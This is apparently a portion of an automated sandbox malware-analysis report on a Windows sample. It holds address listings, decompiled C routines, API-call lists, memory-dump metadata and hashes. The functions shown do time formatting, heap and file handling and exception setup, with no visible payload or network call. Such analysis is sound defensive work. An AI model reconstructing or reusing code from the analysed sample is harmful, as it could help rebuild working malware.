                                                                                                                              0x0040cbcb
                                                                                                                              0x0040cbd7
                                                                                                                              0x0040cbdd
                                                                                                                              0x0040cbe2
                                                                                                                              0x0040cbea
                                                                                                                              0x0040cbea
                                                                                                                              0x0040cbe4
                                                                                                                              0x0040cbe4
                                                                                                                              0x0040cbe4
                                                                                                                              0x0040cbfc
                                                                                                                              0x0040cc02
                                                                                                                              0x0040cc0a
                                                                                                                              0x0040cc0e
                                                                                                                              0x0040cc12
                                                                                                                              0x0040cc16
                                                                                                                              0x0040cc1a
                                                                                                                              0x0040cc1e
                                                                                                                              0x0040cc22
                                                                                                                              0x0040cc26
                                                                                                                              0x0040cc2a
                                                                                                                              0x0040cc2e
                                                                                                                              0x0040cc32
                                                                                                                              0x0040cc3a
                                                                                                                              0x0040cc59
                                                                                                                              0x0040cc5e
                                                                                                                              0x0040cc5e
                                                                                                                              0x0040cc67
                                                                                                                              0x0040cc73
                                                                                                                              0x0040cc77
                                                                                                                              0x0040cc69
                                                                                                                              0x0040cc6d
                                                                                                                              0x0040cc6d
                                                                                                                              0x0040cc7d
                                                                                                                              0x0040cc84
                                                                                                                              0x0040cc89
                                                                                                                              0x0040cc93
                                                                                                                              0x0040cc9b
                                                                                                                              0x0040ccb0
                                                                                                                              0x0040ccb0
                                                                                                                              0x0040ccbc
                                                                                                                              0x0040ccc2
                                                                                                                              0x0040ccc2
                                                                                                                              0x0040ccc6
                                                                                                                              0x0040ccc9
                                                                                                                              0x00000000
                                                                                                                              0x0040ccc9
                                                                                                                              0x00000000
                                                                                                                              0x0040cbd7
                                                                                                                              0x0040ccd1
                                                                                                                              0x0040ccd3
                                                                                                                              0x0040ccd3
                                                                                                                              0x0040ccd5
                                                                                                                              0x0040ccd5
                                                                                                                              0x0040ccd9
                                                                                                                              0x0040ccdb
                                                                                                                              0x0040ccdf
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040cce7
                                                                                                                              0x0040ccf2
                                                                                                                              0x0040ccfa
                                                                                                                              0x0040ccfc
                                                                                                                              0x0040ccfe
                                                                                                                              0x0040cd06
                                                                                                                              0x0040cd08
                                                                                                                              0x0040cd0c
                                                                                                                              0x0040cd10
                                                                                                                              0x0040cd14
                                                                                                                              0x0040cd18
                                                                                                                              0x0040cd1c
                                                                                                                              0x0040cd20
                                                                                                                              0x0040cd24
                                                                                                                              0x0040cd28
                                                                                                                              0x0040cd2c
                                                                                                                              0x0040cd30
                                                                                                                              0x0040cd38
                                                                                                                              0x0040cd3a
                                                                                                                              0x0040cd3f
                                                                                                                              0x0040cd3f
                                                                                                                              0x0040cd43
                                                                                                                              0x0040cd48
                                                                                                                              0x0040cd54
                                                                                                                              0x0040cd58
                                                                                                                              0x0040cd4a
                                                                                                                              0x0040cd4e
                                                                                                                              0x0040cd4e
                                                                                                                              0x0040cd65
                                                                                                                              0x0040cd6e
                                                                                                                              0x0040cd71
                                                                                                                              0x0040cd7d
                                                                                                                              0x0040cd85
                                                                                                                              0x0040cd9b
                                                                                                                              0x0040cd9b
                                                                                                                              0x0040cd9d
                                                                                                                              0x0040cda3
                                                                                                                              0x0040cda6
                                                                                                                              0x00000000
                                                                                                                              0x0040cda6
                                                                                                                              0x00000000
                                                                                                                              0x0040ccfe
                                                                                                                              0x0040cdae
                                                                                                                              0x0040cdb4
                                                                                                                              0x0040cdb6
                                                                                                                              0x0040cdb8
                                                                                                                              0x0040cdbc
                                                                                                                              0x0040cdbe
                                                                                                                              0x0040cdc0
                                                                                                                              0x0040cdc3
                                                                                                                              0x0040cdc3
                                                                                                                              0x0040cdc6
                                                                                                                              0x0040cdcb
                                                                                                                              0x0040cdcc
                                                                                                                              0x0040cdd1
                                                                                                                              0x0040cdd1
                                                                                                                              0x0040cdd4
                                                                                                                              0x0040cdda
                                                                                                                              0x0040cddd
                                                                                                                              0x0040cde1
                                                                                                                              0x0040cde4
                                                                                                                              0x0040cde7
                                                                                                                              0x0040cde7
                                                                                                                              0x0040cdeb
                                                                                                                              0x0040cdeb
                                                                                                                              0x0040cdef
                                                                                                                              0x0040cdf0
                                                                                                                              0x0040cdf5
                                                                                                                              0x0040cdf9
                                                                                                                              0x0040cdfd
                                                                                                                              0x0040cdfd
                                                                                                                              0x0040ce00
                                                                                                                              0x0040ce02
                                                                                                                              0x0040ce06
                                                                                                                              0x0040ce0a
                                                                                                                              0x0040ce0e
                                                                                                                              0x0040ce10
                                                                                                                              0x0040ce12
                                                                                                                              0x0040ce14
                                                                                                                              0x0040ce14
                                                                                                                              0x0040ce17
                                                                                                                              0x0040ce17
                                                                                                                              0x0040ce1a
                                                                                                                              0x0040ce1f
                                                                                                                              0x0040ce20
                                                                                                                              0x0040ce25
                                                                                                                              0x0040ce25
                                                                                                                              0x0040ce28
                                                                                                                              0x0040ce2e
                                                                                                                              0x0040ce31
                                                                                                                              0x0040ce35
                                                                                                                              0x0040ce3b
                                                                                                                              0x0040ce3b
                                                                                                                              0x0040ce3f
                                                                                                                              0x0040ce3f
                                                                                                                              0x0040ce43
                                                                                                                              0x0040ce44
                                                                                                                              0x0040ce49
                                                                                                                              0x0040ce49
                                                                                                                              0x0040ce53
                                                                                                                              0x0040ce5b
                                                                                                                              0x0040ce5c
                                                                                                                              0x0040ce5e
                                                                                                                              0x0040ce66
                                                                                                                              0x0040ce73

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset
                                                                                                                              • String ID: %d items
                                                                                                                              • API String ID: 2102423945-2346565835
                                                                                                                              • Opcode ID: 388fd8a126f77cb45d5870fab868bec49ceb1418cbb9ef15b3125456347749f1
                                                                                                                              • Instruction ID: e857353eb25ad537acc46048e037d84eadd67753ac612aa0c39adce0683e816e
                                                                                                                              • Opcode Fuzzy Hash: 388fd8a126f77cb45d5870fab868bec49ceb1418cbb9ef15b3125456347749f1
                                                                                                                              • Instruction Fuzzy Hash: 25B17FB1908300CFD724DF68C88175ABBE1BB89704F444A2EF589AB391E775E945CB86
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00976F7E Relevance: 4.7, APIs: 3, Instructions: 166fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0097651E: RtlAllocateHeap.NTDLL(00000008,00000020,00000000,?,00974A01,00000001,00000364,00000008,000000FF,?,00976497,009765BE,?,?,0096FB64,?), ref: 0097655F
                                                                                                                              • _free.LIBCMT ref: 00977005
                                                                                                                              • _free.LIBCMT ref: 0097701A
                                                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009770CD
                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0097714B
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0097718D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File_free$AllocateCloseFirstHeapNext
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1826900436-0
                                                                                                                              • Opcode ID: 76de77aeb300fcad2cb67f53cc7bf93326eaa9781105f1fbcff81f380dd41272
                                                                                                                              • Instruction ID: 0b3c7298f3b05a299a44993c7c7701d00ff02f0e04bf63f4d0a80b3f201cfd3b
                                                                                                                              • Opcode Fuzzy Hash: 76de77aeb300fcad2cb67f53cc7bf93326eaa9781105f1fbcff81f380dd41272
                                                                                                                              • Instruction Fuzzy Hash: C34106736046056BDB24AFB9DC85EBBB7ADEFC5310F54C469F91E97241EA309D00C660
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00418030 Relevance: 4.6, APIs: 3, Instructions: 136timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 31%
                                                                                                                              			E00418030(intOrPtr __ebx, void* __ecx, void* __ebp, intOrPtr _a4) {
				char _v12;
				signed int _v16;
				char _v60;
				intOrPtr _v68;
				signed int _v72;
				char _v2072;
				char _v2092;
				char _v2116;
				char _v2172;
				char _v2200;
				struct _SYSTEMTIME _v2232;
				char _v2244;
				char _v2252;
				char _v2260;
				intOrPtr _v2288;
				void* __edi;
				void* __esi;
				signed int _t40;
				signed int _t42;
				intOrPtr* _t60;
				intOrPtr _t71;
				intOrPtr* _t103;
				intOrPtr _t104;
				void* _t106;
				intOrPtr _t107;
				intOrPtr* _t108;
				void* _t112;
				signed int _t113;
				void* _t114;
				void* _t117;

				_t71 = __ebx;
				_push(0xffffffff);
				_push(E0043139D);
				_push( *[fs:0x0]);
				_t113 = _t112 - 0x8ac;
				_t40 =  *0x43a6a8; // 0x2a5cd135
				_v16 = _t40 ^ _t113;
				_push(_t103);
				_t42 =  *0x43a6a8; // 0x2a5cd135
				_push(_t42 ^ _t113);
				 *[fs:0x0] =  &_v12;
				_t110 = _a4;
				_push(1);
				_t106 = __ecx;
				_v2232.wDayOfWeek = _a4;
				_v2232.wYear = 0;
				E00417EB0( &_v2200, 3);
				_v12 = 1;
				GetLocalTime( &_v2232);
				_push(0x400);
				asm("sbb edx, edx");
				_push( &_v2072);
				_push( !( ~( *(_t106 + 0x2c))) & L"yyyy/MM/dd");
				_push( &_v2232);
				_push(0);
				_push(0x400);
				if( *0x43ba60() != 0) {
					E00417370( &(_v2232.wSecond),  &_v2092);
					_t113 = _t113 + 8;
				}
				E00417370( &(_v2232.wSecond), 0x433140);
				_t114 = _t113 + 8;
				_push(0x400);
				asm("sbb edx, edx");
				_push( &_v2092);
				_push( !( ~( *(_t106 + 0x2c))) & L"hh:mm:ss");
				_push( &_v2252);
				_push(8);
				_push(0x400);
				if( *0x43ba78() != 0) {
					E00417370( &_v2244,  &_v2116);
					_t114 = _t114 + 8;
				}
				if( *(_t106 + 0x2c) == 0) {
					_t103 = E0041A8FA( &_v2260, 3);
					_t60 = E00417370( &_v2244, 0x4337bc);
					_t108 = _t60;
					_t117 = _t114 + 0x10;
					if(_t108 != 0) {
						_t60 =  *((intOrPtr*)( *_t108 + 4)) + _t108;
					}
					 *((intOrPtr*)( *_t103))(_t60,  *((intOrPtr*)(_t103 + 4)));
					_t114 = _t117 + 8;
					 *((short*)( *((intOrPtr*)( *_t108 + 4)) + _t108 + 0x30)) = 0x30;
					_t123 = GetTickCount() % 0x3e8;
					E00417590(_t108, GetTickCount() % 0x3e8, GetTickCount() % 0x3e8);
				}
				E00416080(_t110);
				_v2288 = 1;
				_v60 = 0;
				E00414250(_t71, _t103, _t110, _t123);
				_v2172 = 0x4335a0;
				E0041A4B9(_t71, _t103, _t110,  &_v2172);
				 *[fs:0x0] = _v68;
				_pop(_t104);
				_pop(_t107);
				return E0041B3F9(_t110, _t71, _v72 ^ _t114 + 0x00000004,  &_v2172, _t104, _t107);
			}

































                                                                                                                              0x00418030
                                                                                                                              0x00418030
                                                                                                                              0x00418032
                                                                                                                              0x0041803d
                                                                                                                              0x0041803e
                                                                                                                              0x00418044
                                                                                                                              0x0041804b
                                                                                                                              0x00418054
                                                                                                                              0x00418055
                                                                                                                              0x0041805c
                                                                                                                              0x00418064
                                                                                                                              0x0041806a
                                                                                                                              0x00418071
                                                                                                                              0x00418073
                                                                                                                              0x0041807b
                                                                                                                              0x0041807f
                                                                                                                              0x00418087
                                                                                                                              0x00418091
                                                                                                                              0x0041809c
                                                                                                                              0x004180a7
                                                                                                                              0x004180ac
                                                                                                                              0x004180b5
                                                                                                                              0x004180be
                                                                                                                              0x004180c3
                                                                                                                              0x004180c4
                                                                                                                              0x004180c6
                                                                                                                              0x004180d3
                                                                                                                              0x004180e2
                                                                                                                              0x004180e7
                                                                                                                              0x004180e7
                                                                                                                              0x004180f4
                                                                                                                              0x004180fc
                                                                                                                              0x00418101
                                                                                                                              0x00418106
                                                                                                                              0x0041810f
                                                                                                                              0x00418118
                                                                                                                              0x0041811d
                                                                                                                              0x0041811e
                                                                                                                              0x00418120
                                                                                                                              0x0041812d
                                                                                                                              0x0041813c
                                                                                                                              0x00418141
                                                                                                                              0x00418141
                                                                                                                              0x00418148
                                                                                                                              0x00418160
                                                                                                                              0x00418162
                                                                                                                              0x00418167
                                                                                                                              0x00418169
                                                                                                                              0x0041816e
                                                                                                                              0x00418175
                                                                                                                              0x00418175
                                                                                                                              0x0041817e
                                                                                                                              0x00418187
                                                                                                                              0x0041818a
                                                                                                                              0x0041819d
                                                                                                                              0x004181a2
                                                                                                                              0x004181a2
                                                                                                                              0x004181ac
                                                                                                                              0x004181b8
                                                                                                                              0x004181c0
                                                                                                                              0x004181c8
                                                                                                                              0x004181d5
                                                                                                                              0x004181e0
                                                                                                                              0x004181f1
                                                                                                                              0x004181f9
                                                                                                                              0x004181fa
                                                                                                                              0x00418210

                                                                                                                              APIs
                                                                                                                              • GetLocalTime.KERNEL32 ref: 0041809C
                                                                                                                              • GetTickCount.KERNEL32 ref: 00418190
                                                                                                                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004181E0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CountIos_base_dtorLocalTickTimestd::ios_base::_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1176894447-0
                                                                                                                              • Opcode ID: d1f7f069c8a948ce13fc83a21f529e87956a4152faf6145f2d0278982cafc38a
                                                                                                                              • Instruction ID: 1bbf674f81278bcbb6e8b9ee8f6dafed06333062e5309e7a9fe9f5d573b3979a
                                                                                                                              • Opcode Fuzzy Hash: d1f7f069c8a948ce13fc83a21f529e87956a4152faf6145f2d0278982cafc38a
                                                                                                                              • Instruction Fuzzy Hash: B64175B5604340ABD324DF55CC41F9BB7E8EF88714F04891EF58987291EB78A548C7AA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00977032 Relevance: 4.6, APIs: 3, Instructions: 132fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009770CD
                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0097714B
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0097718D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3541575487-0
                                                                                                                              • Opcode ID: d5880c24bacf2bc3ad5fe40e2208b38efbada2750e4af4527ec593889f9775d6
                                                                                                                              • Instruction ID: d2a93c936689f92d9257fde4fb889eb797f306c4fa33f61bd3435a3db8d8743b
                                                                                                                              • Opcode Fuzzy Hash: d5880c24bacf2bc3ad5fe40e2208b38efbada2750e4af4527ec593889f9775d6
                                                                                                                              • Instruction Fuzzy Hash: 21418573A082156BDB20EFA5DC89EBBF7BDEBC5350F4481A9E409D7181EA309E40CB54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00975939 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00975A31
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00975A3B
                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00975A48
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3906539128-0
                                                                                                                              • Opcode ID: 1f33dc7b072c31a9a9b0e74fd26650eb5eef5278de9e181f20639d1b6d421468
                                                                                                                              • Instruction ID: 170a5b9e19dabe4abbd8be447e5fb1ce1c2be66f839b6afcb7300e3f93181e82
                                                                                                                              • Opcode Fuzzy Hash: 1f33dc7b072c31a9a9b0e74fd26650eb5eef5278de9e181f20639d1b6d421468
                                                                                                                              • Instruction Fuzzy Hash: C831A27591122DDBCB61DF68D889B8DBBB8BF48310F5082EAE41CA7251E7709B858F44
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00419B30 Relevance: 2.5, APIs: 2, Instructions: 22memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00419B30(intOrPtr* __ecx) {
				void* _t5;
				intOrPtr* _t11;

				_t11 = __ecx;
				_t5 =  *(__ecx + 8);
				 *__ecx = 0x433dc8;
				if(_t5 != 0) {
					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
				}
				if( *(_t11 + 0xc) != 0) {
					_t5 = GetProcessHeap();
					if(_t5 != 0) {
						return HeapFree(_t5, 0,  *(_t11 + 0xc));
					}
				}
				return _t5;
			}





                                                                                                                              0x00419b31
                                                                                                                              0x00419b33
                                                                                                                              0x00419b38
                                                                                                                              0x00419b3e
                                                                                                                              0x00419b46
                                                                                                                              0x00419b46
                                                                                                                              0x00419b4c
                                                                                                                              0x00419b4e
                                                                                                                              0x00419b56
                                                                                                                              0x00000000
                                                                                                                              0x00419b5f
                                                                                                                              0x00419b56
                                                                                                                              0x00419b66

                                                                                                                              APIs
                                                                                                                              • GetProcessHeap.KERNEL32 ref: 00419B4E
                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00419B5F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$FreeProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3859560861-0
                                                                                                                              • Opcode ID: 804a57880af375c990f9b13ba14e225b8e3e8b0a8003707646554373bdf4057e
                                                                                                                              • Instruction ID: 5f73824e1eed3d8d593ed48e990b89e7956d6bd68d95112e7b0b03f151e140e3
                                                                                                                              • Opcode Fuzzy Hash: 804a57880af375c990f9b13ba14e225b8e3e8b0a8003707646554373bdf4057e
                                                                                                                              • Instruction Fuzzy Hash: 6FE01A306046009FD7289F65E858FA773A8BF48701F14841DE24A872A0CBB8FC80CB18
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0097B40C Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0097B367,?,?,00000008,?,?,0097AFD0,00000000), ref: 0097B639
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionRaise
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3997070919-0
                                                                                                                              • Opcode ID: 32496f6dac2150789b156eb00044242ebad7247371d73c7006c128750fd4e0d5
                                                                                                                              • Instruction ID: 18e30ea2cdd355e21de6c4fa56e464e67c7c36e3bb38ecebbe64bd44de3a710b
                                                                                                                              • Opcode Fuzzy Hash: 32496f6dac2150789b156eb00044242ebad7247371d73c7006c128750fd4e0d5
                                                                                                                              • Instruction Fuzzy Hash: 32B12A32210608DFDB15CF28C49AB657BA0FF45364F29C658E99ECF2A1C335E992CB40
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00412B20 Relevance: 1.5, APIs: 1, Instructions: 37comCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 68%
                                                                                                                              			E00412B20(intOrPtr* __ecx) {
				intOrPtr* _t6;
				intOrPtr* _t8;
				intOrPtr* _t18;
				intOrPtr* _t19;

				_t19 = __ecx + 4;
				if( *((intOrPtr*)(__ecx + 4)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *__ecx + 4))))();
					_t6 =  *_t19;
					if(_t6 != 0) {
						_t6 =  *((intOrPtr*)( *((intOrPtr*)( *_t6 + 8))))(_t6);
						 *_t19 = 0;
					}
				}
				__imp__CoCreateInstance(0x433564, 0, 0x17, 0x433548, _t19);
				_t18 = _t6;
				if(_t18 < 0) {
					_t8 =  *_t19;
					if(_t8 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t8 + 8))))(_t8);
						 *_t19 = 0;
					}
				}
				return _t18;
			}







                                                                                                                              0x00412b25
                                                                                                                              0x00412b29
                                                                                                                              0x00412b30
                                                                                                                              0x00412b32
                                                                                                                              0x00412b36
                                                                                                                              0x00412b3e
                                                                                                                              0x00412b40
                                                                                                                              0x00412b40
                                                                                                                              0x00412b36
                                                                                                                              0x00412b55
                                                                                                                              0x00412b5b
                                                                                                                              0x00412b5f
                                                                                                                              0x00412b61
                                                                                                                              0x00412b65
                                                                                                                              0x00412b6d
                                                                                                                              0x00412b6f
                                                                                                                              0x00412b6f
                                                                                                                              0x00412b65
                                                                                                                              0x00412b79

                                                                                                                              APIs
                                                                                                                              • CoCreateInstance.OLE32(00433564,00000000,00000017,00433548,00000000,?,?,00412DA9,?,?,00000000,?,?,00000000,?), ref: 00412B55
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateInstance
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 542301482-0
                                                                                                                              • Opcode ID: 083b7cee6bedb96131651cb1c8b0eed7aff305fd4a9e65e1a7856fd51a2d0ac7
                                                                                                                              • Instruction ID: 47ea134917f275dfaf97dd1a562dff0068afef71a09fd2790d3757f19a27f504
                                                                                                                              • Opcode Fuzzy Hash: 083b7cee6bedb96131651cb1c8b0eed7aff305fd4a9e65e1a7856fd51a2d0ac7
                                                                                                                              • Instruction Fuzzy Hash: E7F04975240A00AFD320DF19DD80B92B7A5AF89701F358059E649DB3A0EBB6E882CB54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00424EE4 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00424EE4() {

				SetUnhandledExceptionFilter(E00424EA7);
				return 0;
			}



                                                                                                                              0x00424ee9
                                                                                                                              0x00424ef1

                                                                                                                              APIs
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00024EA7), ref: 00424EE9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3192549508-0
                                                                                                                              • Opcode ID: f631751468b62c1ab3acab780b0f0e82c618a6f0c79b151dcf644e405a22659b
                                                                                                                              • Instruction ID: 9c3f0fe04701da302cedd5dfec9bc47ce2598336056845d8bc43aa8081284664
                                                                                                                              • Opcode Fuzzy Hash: f631751468b62c1ab3acab780b0f0e82c618a6f0c79b151dcf644e405a22659b
                                                                                                                              • Instruction Fuzzy Hash: 7E900270352520465B0457706F1A60A3691AB98702BA214617241C4094DB94C0006529
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00967980 Relevance: .9, Instructions: 894COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6c7af93f8f70f1c97e630917afd404bdf741bbe849380d2f3fd879431acd7b57
                                                                                                                              • Instruction ID: f95a01aceaa4d5c06afa49140b682a7449e2c405d5c2c2e9e54bd4fecf1f4891
                                                                                                                              • Opcode Fuzzy Hash: 6c7af93f8f70f1c97e630917afd404bdf741bbe849380d2f3fd879431acd7b57
                                                                                                                              • Instruction Fuzzy Hash: 4162273561C3018BCA2C8E9988A453FF6E5AF95328F644B0EF4539B7E4DB358D458B83
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00428620 Relevance: .4, Instructions: 384COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
